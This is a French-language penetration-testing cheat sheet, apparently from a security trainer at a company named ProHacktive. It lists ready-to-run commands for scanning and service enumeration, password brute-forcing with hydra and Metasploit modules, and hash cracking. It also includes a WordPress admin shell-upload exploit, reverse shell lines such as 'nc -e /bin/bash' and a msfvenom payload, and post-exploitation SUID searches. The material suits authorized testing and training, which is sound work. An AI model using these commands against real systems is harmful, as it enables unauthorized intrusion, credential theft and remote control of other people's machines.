Scanning

ARP

netdiscover -i $INTERFACE
netdiscover -i $INTERFACE -r $RANGE
netdiscover -i $INTERFACE -p
nmap -sn $RANGE

NetBIOS

nbtscan -r $RANGE

Port scanning

nmap -A $TARGET
nmap -p- $TARGET
nmap $TARGET
nmap -F $TARGET
nmap -v -Pn -p0-65535 -T4 $TARGET
nmap -Pn -sC -sV -p "20-25,53,80,135,139,443,445" $TARGET
nmap -Pn --script vuln -sV -p "20-25,53,80,135,139,443,445" $TARGET
nmap -sU -sV --top-ports 20 $TARGET
masscan -e $INTERFACE -p0-65535,U:0-65535 --max-rate 100000 $TARGETS

Enumération

nikto -h http://$IP

FTP (port 21)

telnet -vn $IP $PORT
nmap -sS -sV -p21 $IP

ftp $IP
> anonymous
> anonymous

$ msfconsole
msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set RHOSTS $IP
msf auxiliary(anonymous) > set THREADS 55
msf auxiliary(anonymous) > run

crackmapexec ftp $ip[/24] -u anonymous -p anonymous

SSH (port 22)

ssh $username@$IP
ssh -i key.txt $username@$IP
ssh $username@$IP -t "bash --noprofile"
ssh -v $IP
nc -vn $IP 22
ssh-keyscan -t rsa $IP -p $PORT
nmap -sV -p22 $IP
nmap -p22 -n -sV --script ssh2-enum-algos $IP

Telnet (port 23)

nmap -sV -p23 $IP
telnet $IP $PORT

SMTP (port 25-587)

nmap -p25 --script smtp-commands $IP
nmap --script smtp-enum-users $IP
swaks --to $destinataire --server $serveur_SMTP

$ msfconsole
msf > use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set RHOSTS $IP
msf auxiliary(smtp_enum) > run

DNS (port 53)

nmap -v -sV -p 53 $SUBNET/$MASK
nmap -v -sV -sU -p 53 $SUBNET/$MASK
dig +short ns $domaine
dnsenum $domaine
nslookup -type=ptr $IP_address
dnsrecon -r $RANGE -n $DC_IP
nmap --script dns-srv-enum --script-args dns-srv-enum.domain=$FQDN_DOMAIN

SNMP (port 161-162)

$ msfconsole
msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(snmp_enum) > set RHOSTS $IP
msf auxiliary(snmp_enum) > run

$ msfconsole
msf > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(snmp_enumshares) > set RHOSTS $IP
msf auxiliary(snmp_enumshares) > set THREADS 11
msf auxiliary(snmp_enumshares) > run

$ msfconsole
msf > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumshares) > set RHOSTS $IP
msf auxiliary(snmp_enumshares) > set THREADS 11
msf auxiliary(snmp_enumshares) > run

SMB (port 445-139)

nmap -sS -sV -p445-139 $IP
nmap -p139-445 --script=smb-vuln* $IP
smbclient --list //$IP
smbmap -H $IP
smbclient --no-pass --list //$IP
smbclient --user ''%'' --list //$IP
smbmap -u '' -p '' -H $IP
smbclient //$IP/$SHARE_NAME
crackmapexec smb $TARGETS -u '' -p '' --shares
crackmapexec smb $IP -u '$username' -p '$password' --shares
crackmapexec smb $IP -u '$username' -H '$hash' --shares
crackmapexec smb $IP -u '$username' -p '$password' --spider C$ --pattern txt
mount -t cifs //$IP/$Fichier /mnt/partage
mount -t cifs -o "username=$username,password=$password" //$IP/$Fichier /mnt/partage

RDP (port 3389)

nmap -A -p3389 $IP
rdesktop -u $username $IP
rdesktop -d $domain -u $username -p $password $IP
xfreerdp /u:[domain\]$username /p:$password /v:$IP
xfreerdp /u:[domain\]$username /pth:$hash /v:$IP
crackmapexec rdp $IP --nla-screenshot

MySQL (port 3306)

nmap -sV -p3306 $IP
mysql -h $IP -u $username -p

Web Application Firewall (WAF)

wafw00f $URL
whatwaf -u $URL
nmap -p $PORT --script=http-waf-fingerprint,http-waf-detect $URL

John The Ripper

john hash
zip2john file.zip > pass.hash
john --wordlist=/usr/share/wordlists/rockyou.txt pass.hash

Directory Bruteforce

dirb http://$IP/
dirb http://$IP/ -X .txt
dirb http://$IP/ /usr/share/wordlists/dirb/big.txt
gobuster dir -u http://$IP[:$PORT] -w /usr/share/wordlists/dirb/big.txt
gobuster vhost -u $domain -w /usr/share/wordlists/dirb/big.txt | grep 200

Bruteforce

cewl http://$IP/ -w dict.txt

FTP (port 21)

nmap --script ftp-* -p21 $IP
hydra -l $user -s 21 -P $path_pass_list $IP -t 4 ftp
hydra -L usernames.txt -P passwords.txt $IP ftp

SSH (port 22)

hydra -l $user -s 22 -P $path_pass_list $IP -t 4 ssh

Telnet (port 23)

$ msfconsole
msf > use auxiliary/scanner/telnet/telnet_login
msf auxiliary(scanner/telnet/telnet_login) > set rhosts $IP
msf auxiliary(scanner/telnet/telnet_login) > set user_file user.txt
msf auxiliary(scanner/telnet/telnet_login) > set pass_file pass.txt
msf auxiliary(scanner/telnet/telnet_login) > set stop_on_success true
msf auxiliary(scanner/telnet/telnet_login) > exploit

SNMP (port 161-162)

$ msfconsole
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_enumshares) > set RHOSTS $IP
msf auxiliary(snmp_enumshares) > set THREADS 200 #par exemple
msf auxiliary(snmp_enumshares) > run

SMB (port 445-139)

hydra -L usernames.txt -P passwords.txt $IP -V -f smb
nmap --script smb-brute -p 445 $IP
crackmapexec smb $IP/24 -u user.txt -p pass.txt

RDP (port 3389)

hydra -L user.txt -P pass.txt $IP rdp

MySQL (port 3306)

$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > set rhosts $IP
msf auxiliary(scanner/mysql/mysql_login) > set user_file user.txt
msf auxiliary(scanner/mysql/mysql_login) > set pass_file pass.txt
msf auxiliary(scanner/mysql/mysql_login) > exploit

nmap -p3306 --script=mysql-brute --script-args userdb=user.txt, passdb=pass.txt $IP

Encoding / Decoding

echo '' | base64 -d

Exploitation

aircrack-ng -w /usr/share/wordlists/rockyou.txt file.cap

Shell amélioré

python -c 'import pty;pty.spawn("/bin/bash")'

Python Web Server

python -m SimpleHTTPServer

CMS

wpscan --url http://$IP/$wordpress_path/ --enumerate
wpscan --url http://$IP/$wordpress_path/ -U usr -P /usr/share/wordlists/rockyou.txt
joomscan $IP
joomscan -u http://$IP/joomla

$ msfconsole
msf > use exploit/unix/webapp/wp_admin_shell_upload msf exploit(unix/webapp/wp_admin_shell_upload) > set rhosts $IP msf exploit(unix/webapp/wp_admin_shell_upload) > set username admin msf exploit(unix/webapp/wp_admin_shell_upload) > set password Password@123 msf exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /$wordpress_path/ msf exploit(unix/webapp/wp_admin_shell_upload) > exploit

Recherche d'exploits

searchsploit $technology
searchsploit -x $exploit_path
searchsploit -m $exploit_path
searchsploit -u

Reverse Shell

nc -lvp $PORT
nc -e /bin/bash $IP $PORT
msfvenom -p cmd/unix/reverse_python lhost=$IP lport=$PORT R

WebDav

cadaver http://$IP/webdav

Steganography

steghide extract -sf image.jpeg

Post-Exploitation

find / -type f -perm -ug=rwx 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

Formateur

Bertrand LECLERCQ

Security Developer / Pentester

Me Contacter

Je travaille chez ProHacktive en tant que Security developer et Community Manager. Je travaille sur l'aspect offensif du boitier Sherlock : découvrez tous les offres pour entrer dans l'ère de la Cyber Sérénité !